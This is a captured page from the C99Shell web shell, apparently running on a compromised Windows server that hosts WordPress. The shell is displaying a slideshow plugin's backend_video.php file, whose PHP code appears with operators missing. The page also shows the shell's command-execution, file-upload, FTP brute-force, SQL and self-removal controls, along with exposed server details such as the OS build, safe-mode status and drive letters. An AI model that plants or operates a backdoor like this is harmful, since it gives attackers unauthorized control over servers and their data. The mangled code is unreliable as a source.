!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideshowSlide\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     backend_video.php (1.62 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

$videoId           
'';
$showRelatedVideos 'false';

if (isset(
$properties['videoId']))
{
    
$videoId $properties['videoId'];
}

if (isset(
$properties['showRelatedVideos']) &&
    
$properties['showRelatedVideos'] === 'true')
{
    
$showRelatedVideos 'true';
}

?>

<div class="widefat sortable-slides-list-item postbox">

    <div class="handlediv" title="<?php _e('Click to toggle'); ?>"><br></div>

    <div class="hndle">
        <div class="slide-icon video-slide-icon"></div>
        <div class="slide-title">
            <?php _e('Video slide''slideshow-plugin'); ?>
        </div>
        <div class="clear"></div>
    </div>

    <div class="inside">

        <div class="slideshow-group">

            <div class="slideshow-label"><?php _e('Youtube Video ID''slideshow-plugin'); ?></div>
            <input type="text" name="<?php echo $name?>[videoId]" value="<?php echo $videoId?>" style="width: 100%;" />

        </div>

        <div class="slideshow-group">

            <div class="slideshow-label"><?php _e('Show related videos''slideshow-plugin'); ?></div>
            <label><input type="radio" name="<?php echo $name?>[showRelatedVideos]" value="true" <?php checked('true'$showRelatedVideos); ?>><?php _e('Yes''slideshow-plugin'); ?></label>
            <label><input type="radio" name="<?php echo $name?>[showRelatedVideos]" value="false" <?php checked('false'$showRelatedVideos); ?>><?php _e('No''slideshow-plugin'); ?></label>

        </div>

        <div class="slideshow-group slideshow-delete-slide">
            <span><?php _e('Delete slide''slideshow-plugin'); ?></span>
        </div>

        <input type="hidden" name="<?php echo $name?>[type]" value="video" />

    </div>

</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--